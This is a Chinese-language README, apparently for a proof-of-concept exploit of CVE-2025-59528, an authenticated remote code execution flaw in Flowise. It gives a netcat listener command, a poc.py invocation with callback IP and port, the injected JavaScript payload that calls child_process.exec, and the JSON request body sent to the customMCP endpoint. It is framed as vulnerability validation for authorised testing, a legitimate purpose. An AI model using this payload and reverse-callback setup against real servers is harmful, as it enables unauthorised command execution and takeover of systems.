
CVE-2025-59528 的概念验证,演示了通过 mcpServerConfig 注入在 Flowise 中实现经过身份验证的远程代码执行,并提供了可复现的步骤,供授权测试使用。
专注于在授权环境中对该漏洞进行技术验证的最小化 PoC。
nc -lvn 4444)。首先启动监听器:
nc -lvn 4444
python3 poc.py --domain example.com --host 10.10.10.1 --port 4444 --api YOUR_VALID_API_KEY
将上述值替换为您授权环境中的实际设置。
3.0.5远程代码执行(RCE)POST /api/v1/node-load-method/customMCP 端点问题源于 inputs.mcpServerConfig 的处理方式:该值以允许服务端执行 JavaScript 的方式进行解析。实际上,经过身份验证的攻击者可以注入一个调用 child_process 并执行操作系统命令的表达式。
利用流程如下:
customMCP 端点构建请求。mcpServerConfig 中放入恶意 JavaScript 表达式。process.mainModule.require('child_process')。exec/execSync)。如果被接受,服务器将在其系统上下文中执行该命令。
poc.py)该脚本接受四个参数:
-d/--domain:目标域名-lh/--host:回调 IP-lp/--port:回调端口-A/--api:Bearer API 令牌然后它会:
http://<domain>/api/v1/node-load-method/customMCPAuthorization: Bearer <token> 请求头({
x: (function () {
const cp = process.mainModule.require("child_process");
cp.exec("<commande>");
return 1;
})(),
});
{
"loadMethod": "listActions",
"inputs": {
"mcpServerConfig": "<injected JS expression>"
}
}
与 EDB PoC(其执行邮箱/密码登录、使用浏览器风格的请求头,并运行自由格式的 --cmd)相比,此脚本更适合纯 PoC 验证:
mcpServerConfig 注入和服务端执行。简而言之:EDB 脚本是更通用的攻击性演示,而此 PoC 更侧重于技术可复现性。
https 模式或证书处理。--cmd 参数化)。仅对您拥有或已获得明确授权的系统进行测试。